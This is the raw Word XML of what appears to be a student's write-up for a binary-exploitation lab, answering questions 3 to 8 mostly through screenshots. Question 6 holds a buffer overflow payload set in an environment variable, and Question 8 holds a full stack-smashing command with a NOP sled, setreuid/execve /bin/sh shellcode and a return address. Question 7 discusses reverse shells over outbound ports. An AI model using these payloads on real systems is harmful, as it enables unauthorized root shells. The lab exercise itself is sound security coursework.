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C8A1" w14:textId="77777777" w:rsidR="00084030" w:rsidRDefault="00BF5FD8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79929091" w14:textId="77777777" w:rsidR="00BF5FD8" w:rsidRDefault="00FE0A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E058EB" wp14:editId="07BFE9F8">
            <wp:extent cx="5274310" cy="206516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00D7" w14:textId="77777777" w:rsidR="006D00D4" w:rsidRDefault="006D00D4"/>
    <w:p w14:paraId="3549FCD1" w14:textId="77777777" w:rsidR="00026A29" w:rsidRDefault="00026A29">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7274A70E" w14:textId="77777777" w:rsidR="0031121D" w:rsidRDefault="0031121D">
      <w:r>
        <w:t>It is easy to find address of function using gdb, and then construct the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039A8B8" w14:textId="77777777" w:rsidR="00026A29" w:rsidRDefault="00AC1257">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="687F8437" wp14:editId="7F0029DD">
            <wp:extent cx="5274310" cy="1753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4C39" w14:textId="77777777" w:rsidR="007D439D" w:rsidRDefault="007D439D">
      <w:r>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091AF516" w14:textId="77777777" w:rsidR="003C0A86" w:rsidRDefault="003C0A86">
      <w:r>
        <w:t>This code enables program to read secret file directly. But unfortunately, the file name in code is ‘secet’. We could re-edit a cat file</w:t>
      </w:r>
      <w:r w:rsidR="00B045DF">
        <w:t xml:space="preserve"> which is about to read secet as secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A390EB4" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00FE0A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4452F51A" wp14:editId="3D91BCFD">
            <wp:extent cx="5076825" cy="3533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F4B2" w14:textId="77777777" w:rsidR="00955707" w:rsidRDefault="00955707">
      <w:r>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB91A51" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00717510">
      <w:r>
        <w:t>To solve it we only need to write payload in enviroment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67338478" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00FE0A0B">
      <w:r w:rsidRPr="00FE0A0B">
        <w:t>export Q6_SECRET_CODE=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DD0C7" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00FE0A0B">
      <w:r w:rsidRPr="00FE0A0B">
        <w:t>$(python -c "import sys;f='A'*1024+'\xef\xbe\xad\xde';sys.stdout.buffer.write(f.encode('latin'))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF2C53" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00FE0A0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0C07E2" wp14:editId="37973800">
            <wp:extent cx="5274310" cy="2056615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3150" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="00FE0A0B"/>
    <w:p w14:paraId="516496A3" w14:textId="77777777" w:rsidR="00955707" w:rsidRDefault="00955707">
      <w:r>
        <w:t>Question 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF3DD7C" w14:textId="77777777" w:rsidR="00FE0A0B" w:rsidRDefault="0020581D" w:rsidP="0020581D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>It is possible to get reverse shell on outbounds ports, even inbound ports are restricted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1884919A" w14:textId="77777777" w:rsidR="0020581D" w:rsidRDefault="0020581D" w:rsidP="0020581D">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>Because it is hard to detect backdoor traffic even organisations detect traffic to known C2 servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D27339" w14:textId="77777777" w:rsidR="0020581D" w:rsidRDefault="0020581D"/>
    <w:p w14:paraId="149B26FA" w14:textId="77777777" w:rsidR="00955707" w:rsidRDefault="00955707">
      <w:r>
        <w:t>Question 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F33136C" w14:textId="77777777" w:rsidR="00717510" w:rsidRDefault="00717510">
      <w:r>
        <w:t>It is same as shell code attacking mentioned in workshop. Following the step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057CDE78" w14:textId="77777777" w:rsidR="00717510" w:rsidRDefault="00717510">
      <w:r w:rsidRPr="00717510">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F4C3C1B" wp14:editId="6AAAA50F">
            <wp:extent cx="5274310" cy="3289118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58F8" w14:textId="77777777" w:rsidR="00717510" w:rsidRDefault="00717510">
      <w:r w:rsidRPr="00717510">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8B14B4" wp14:editId="05A61895">
            <wp:extent cx="5274310" cy="171354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DE7D" w14:textId="77777777" w:rsidR="003C0A86" w:rsidRDefault="00717510">
      <w:r w:rsidRPr="00717510">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5009C1C7" wp14:editId="215BCB3B">
            <wp:extent cx="5274310" cy="1559706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452" w14:textId="77777777" w:rsidR="00717510" w:rsidRDefault="00676674">
      <w:r>
        <w:t>Constructing payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E263F7F" w14:textId="77777777" w:rsidR="0020581D" w:rsidRDefault="00676674">
      <w:r w:rsidRPr="00676674">
        <w:t>./run_me $(python3 -c "import sys;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EBF95" w14:textId="77777777" w:rsidR="0020581D" w:rsidRDefault="0020581D">
      <w:r>
        <w:t>filler='\x90'*976</w:t>
      </w:r>
      <w:r w:rsidR="00676674" w:rsidRPr="00676674">
        <w:t xml:space="preserve">+'\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E885CE" w14:textId="77777777" w:rsidR="00676674" w:rsidRDefault="00676674">
      <w:r w:rsidRPr="00676674">
        <w:t>+ 'A'*26 + '\xfc\xd1\xff\xff';sys.stdout.buffer.write(filler.encode('latin'))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861FF0A" w14:textId="77777777" w:rsidR="0020581D" w:rsidRDefault="0020581D">
      <w:r w:rsidRPr="0020581D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59906B67" wp14:editId="14752783">
            <wp:extent cx="5274310" cy="1114686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D5E3" w14:textId="77777777" w:rsidR="00676674" w:rsidRDefault="0020581D">
      <w:r w:rsidRPr="0020581D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D797EF0" wp14:editId="6907BFC9">
            <wp:extent cx="2501537" cy="1535087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786" cy="15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029F" w14:textId="44E01A43" w:rsidR="003C0A86" w:rsidRDefault="003C0A86"/>
    <w:sectPr w:rsidR="003C0A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C7376"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A822BF0C"/>
    <w:lvl w:ilvl="0" w:tplc="604007C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62399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33C8"/>
    <w:rsid w:val="00026A29"/>
    <w:rsid w:val="00084030"/>
    <w:rsid w:val="0020581D"/>
    <w:rsid w:val="0031121D"/>
    <w:rsid w:val="00363B10"/>
    <w:rsid w:val="003C0A86"/>
    <w:rsid w:val="00447304"/>
    <w:rsid w:val="00474346"/>
    <w:rsid w:val="00654E75"/>
    <w:rsid w:val="00676674"/>
    <w:rsid w:val="0068247F"/>
    <w:rsid w:val="006D00D4"/>
    <w:rsid w:val="00717510"/>
    <w:rsid w:val="007D439D"/>
    <w:rsid w:val="009411FA"/>
    <w:rsid w:val="00955707"/>
    <w:rsid w:val="00AC1257"/>
    <w:rsid w:val="00B045DF"/>
    <w:rsid w:val="00B833C8"/>
    <w:rsid w:val="00BF5FD8"/>
    <w:rsid w:val="00D64BA1"/>
    <w:rsid w:val="00E74B69"/>
    <w:rsid w:val="00FE0A0B"/>
    <w:rsid w:val="00FF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EBBB1"/>
  <w15:docId w15:val="{0461C81D-8891-464B-B058-294CEE27B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3B1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63B10"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002058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1565</TotalTime>
  <Pages>4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罗 浩琛</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-26T05:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-26T05:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>